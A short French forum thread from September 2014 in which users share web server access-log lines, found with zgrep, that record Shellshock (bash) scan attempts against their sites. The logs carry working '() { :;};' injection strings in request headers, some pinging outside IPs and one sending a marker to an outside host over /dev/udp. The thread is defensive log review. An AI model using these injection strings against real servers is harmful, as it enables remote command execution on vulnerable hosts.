Ce message a été modifié 2 fois.
Dernière modification : 25 septembre 2014
à 16:18 par
Tchou.
Ce message a été modifié 1 fois.
Dernière modification : 25 septembre 2014
à 17:21 par
Tchou.
Ce message a été modifié 2 fois.
Dernière modification : 25 septembre 2014
à 18:04 par
Tchou.
$ zgrep '};' access.log | grep -v 'SIMBAR'
24.251.197.244 - - [25/Sep/2014:09:58:04 +0200] "GET / HTTP/1.1" 301 452 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
24.251.197.244 - - [25/Sep/2014:09:58:05 +0200] "GET / HTTP/1.1" 200 22152 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
166.78.61.142 - - [25/Sep/2014:13:31:38 +0200] "GET / HTTP/1.1" 301 452 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
ou
209.126.230.72 - - [25/Sep/2014:04:17:00 +0200] "GET / HTTP/1.0" 200 5974 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (blog.erratasec.com/2014/…)"
89.207.135.125 - - [25/Sep/2014:15:24:33 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
(le grep -v SIMBAR c'est pour éviter un user-agent de ce nom qui contient }; dans son UA)
Ce message a été modifié 1 fois.
Dernière modification : 25 septembre 2014
à 18:38 par
Tchou.
/var/log/nginx$ zgrep '};' access.log | grep -v 'SIMBAR'Même tentative que chez toi, mais quelques heures plus tôt
89.207.135.125 - - [25/Sep/2014:07:58:27 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 444 0 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
Ce message a été modifié 1 fois.
Dernière modification : 25 septembre 2014
à 20:54 par
Guybrush.
1996-2024 — Lexpage v4 — GPLv3 (sources)
page générée le 23 novembre 2024 à 14:46:45